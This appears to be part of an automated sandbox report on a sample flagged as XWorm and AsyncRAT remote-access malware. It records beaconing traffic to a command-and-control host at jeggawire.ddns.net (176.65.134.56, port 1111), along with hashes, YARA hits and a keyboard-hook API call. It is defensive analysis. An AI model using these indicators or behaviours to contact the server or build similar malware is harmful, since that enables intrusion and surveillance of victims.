Mar 30, 2025 21:30:39.986701965 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:40.251384020 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:42.313771963 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:42.541377068 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:42.543612003 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:42.772653103 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:42.775636911 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:43.054816008 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:43.058511019 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:43.334644079 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:44.954623938 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:45.185681105 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:45.187364101 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:45.449412107 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:45.449481964 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:45.672018051 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:45.674463987 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:45.967582941 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:48.814457893 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:49.039359093 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:49.045532942 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:49.326188087 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:49.985887051 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:50.222626925 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:50.222707987 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:50.449491024 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:50.449918032 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:50.675904989 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:50.679773092 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:50.963677883 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:50.967608929 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:51.237004042 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:53.282763004 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:53.515036106 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:53.517396927 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:53.782103062 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:54.407519102 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:54.642100096 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:54.643755913 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:54.926417112 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:55.751414061 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:55.975442886 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:55.975522995 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:56.202105999 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:56.202178001 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:56.427172899 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:56.429672956 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:56.661535978 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:56.661647081 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:56.940965891 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:56.941051006 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:57.223223925 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:57.251195908 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:57.481384993 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:57.483320951 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:57.713540077 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:57.789217949 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:59.407562017 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:59.642080069 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:30:59.643914938 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:30:59.924500942 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:01.532629967 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:01.764394999 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:01.764463902 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:01.994939089 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:01.995006084 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:02.266750097 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:02.396424055 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:02.675417900 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:11.751311064 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:12.188378096 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:12.294902086 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:12.295134068 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:12.412816048 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:12.418241024 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:12.533704996 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:12.533730030 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:12.594623089 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:12.688932896 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:12.689074039 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:12.914984941 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:12.919281960 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:13.194183111 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:13.314376116 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:13.543507099 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:13.545172930 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:13.920319080 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:14.149677992 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:22.094944000 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:22.333520889 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:22.333600998 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:22.563339949 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:22.563528061 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:22.792840004 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:22.794099092 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:23.069484949 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:23.073906898 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:23.344957113 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:26.473571062 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:26.705027103 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:26.708183050 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:26.985624075 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:27.613965988 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:27.688376904 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:38.548007011 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:38.775614977 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:38.779464960 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:39.054932117 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:42.079350948 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:42.485810041 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:42.651107073 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:42.651283979 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:42.712709904 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:42.712841988 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:42.884974003 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:42.884998083 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:42.982754946 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:42.986531973 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:42.986650944 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:43.206759930 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:43.213648081 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:43.271666050 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:44.610538006 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:44.847444057 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:44.848978043 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:45.131478071 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:47.610552073 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:47.839116096 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:47.839200020 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:48.077091932 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:48.077181101 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:48.304569960 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:48.304666042 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:48.530850887 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:48.537950993 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:48.816857100 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:48.820985079 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:49.099770069 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:50.313796043 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:50.543293953 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:50.547458887 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:50.813910961 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:52.376288891 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:52.612713099 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:52.620939970 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:52.896893978 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:52.899554014 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:53.127477884 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:53.133512974 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:53.410343885 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:54.079368114 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:54.308825970 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:54.308924913 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:54.532670975 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:54.535605907 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:54.761313915 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:54.761512995 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:55.110364914 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:55.355479956 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:55.359498024 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:55.590162992 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:55.590261936 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:55.958446026 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:56.191418886 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:57.611278057 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:57.693639040 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:59.470916033 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:59.705193996 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:31:59.708964109 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:31:59.988610983 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:04.798108101 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:05.022728920 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:05.022841930 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:05.249310017 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:05.249392986 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:05.729531050 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:05.782087088 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:05.782262087 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:06.008691072 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:06.008802891 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:06.281393051 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:18.173437119 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:18.532042027 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:18.758284092 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:19.048079014 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:19.317950964 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:19.661331892 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:19.664124966 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:19.944808960 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Mar 30, 2025 21:32:19.947510958 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:20.313328028 CEST | 49682 | 1111 | 192.168.2.8 | 176.65.134.56
Mar 30, 2025 21:32:20.538043976 CEST | 1111 | 49682 | 176.65.134.56 | 192.168.2.8
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Mar 30, 2025 21:28:19.100069046 CEST    56201    53    192.168.2.8    1.1.1.1
Mar 30, 2025 21:28:19.208246946 CEST    53    56201    1.1.1.1    192.168.2.8
Mar 30, 2025 21:29:01.937881947 CEST    53    62940    162.159.36.2    192.168.2.8
Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
Mar 30, 2025 21:28:19.100069046 CEST    192.168.2.8    1.1.1.1    0x3daf    Standard query (0)    jeggawire.ddns.net    A (IP address)    IN (0x0001)    false
Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
Mar 30, 2025 21:28:19.208246946 CEST    1.1.1.1    192.168.2.8    0x3daf    No error (0)    jeggawire.ddns.net    -    176.65.134.56    A (IP address)    IN (0x0001)    false

                  Target ID:0
                  Start time:15:28:12
                  Start date:30/03/2025
                  Path:C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe"
                  Imagebase:0x5d0000
                  File size:36'864 bytes
                  MD5 hash:919D580A19380DEBBF5159EC58C35562
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Execution Graph

                  Execution Coverage:18.5%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
Execution graph (node chain): 7ff936862128 -> 7ff936862131 (SetWindowsHookExW) -> 7ff936862201

                  Executed Functions

Control-flow Graph

Control-flow graph of the function starting at 7ff936862a28 (basic-block graph omitted; the function calls 7ff9368605d8, 7ff9368694c0, 7ff9368605e8, 7ff936867fa0, 7ff9368605c0, 7ff936862a78, 7ff936862a80, 7ff936860548, 7ff936862a58, 7ff936860ed0, 7ff9368605b8, 7ff9368605b0, 7ff936862a30, 7ff936869180, 7ff936868450, 7ff936862a38 and 7ff936867fd0).
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID: _u6
                  • API String ID: 0-2070151557
                  • Opcode ID: 2ad99b942af34641e089eb71ade4aab836a60b64bb1aab79969f04222708bb9f
                  • Instruction ID: 9c1f05c7ff3fbeefb5957c0b82953c168f82f6871756ab09dccd878396c85288
                  • Opcode Fuzzy Hash: 2ad99b942af34641e089eb71ade4aab836a60b64bb1aab79969f04222708bb9f
                  • Instruction Fuzzy Hash: E2627130B1C90A4FFB68F7288495BBA76DAFF98310F554578D11ED32C2DEA8B8429741

Control-flow Graph

Control-flow graph of the function at 7ff936866876-7ff936866d33 (basic-block graph omitted; the function calls 7ff936866d34).
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5aff440e4e41b30c2698bc5082635a59d7bb3aadfb0acce73a3772ec808a8e54
                  • Instruction ID: 5db0eb9401d8f0608d237b098f865fd1e7a24577b229b282683e0d9ddf281f7f
                  • Opcode Fuzzy Hash: 5aff440e4e41b30c2698bc5082635a59d7bb3aadfb0acce73a3772ec808a8e54
                  • Instruction Fuzzy Hash: 49F1A930508A8D8FEBA8DF28D855BE97BD1FF58310F04426EE85DC7291CF74A9958782

Control-flow Graph

Control-flow graph of the function at 7ff936867622-7ff936867aaf (basic-block graph omitted; the function calls 7ff936867ab0).
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c22716ff3f299b4dfc7ce4d70a1d65c58cdf7ed714da6e5106d2132074f3f3bb
                  • Instruction ID: 57e6d80cb8a156316afd8868d4286419b852f7f6a88ea732b4e66651db37329b
                  • Opcode Fuzzy Hash: c22716ff3f299b4dfc7ce4d70a1d65c58cdf7ed714da6e5106d2132074f3f3bb
                  • Instruction Fuzzy Hash: 97E1B430908A4D8FEBA8DF28C859BE97BE1EF58310F14426ED85DC7291DF78A94587C1

Control-flow Graph

Control-flow graph of the function at 7ff936862128-7ff936862238 (basic-block graph omitted; the function calls SetWindowsHookExW at block 7ff9368621c2-7ff9368621ff).
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID: HookWindows
                  • String ID:
                  • API String ID: 2559412058-0
                  • Opcode ID: 4b12f980fb1e832b260077bfee80c993d8a2e25bfcb38972287cfc63e8628fac
                  • Instruction ID: c37cfee7ea9e0aaff3f50366749e01e3ae9d9225161da2db94276aaf10d0ab7b
                  • Opcode Fuzzy Hash: 4b12f980fb1e832b260077bfee80c993d8a2e25bfcb38972287cfc63e8628fac
                  • Instruction Fuzzy Hash: E7410730A1CA494FEB18DB5C98467F9BBE5EB59321F00427ED00DC3292CAB5B812C781

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.3290888851.00007FF936860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF936860000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff936860000_1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b95bdb234afc048e904526ec3877c189fa09fe92dd90a00f1c454ca5f3ed638
                  • Instruction ID: 6397c36c8e9e2cbf34b74b06c351b93679ecbaf509d419aeab6ad680a17cc7f6
                  • Opcode Fuzzy Hash: 0b95bdb234afc048e904526ec3877c189fa09fe92dd90a00f1c454ca5f3ed638
                  • Instruction Fuzzy Hash: 7A71D52054E3C45FE347D338A858BA53FA5AF87229F0981FAE098CE4A3DAD95456D343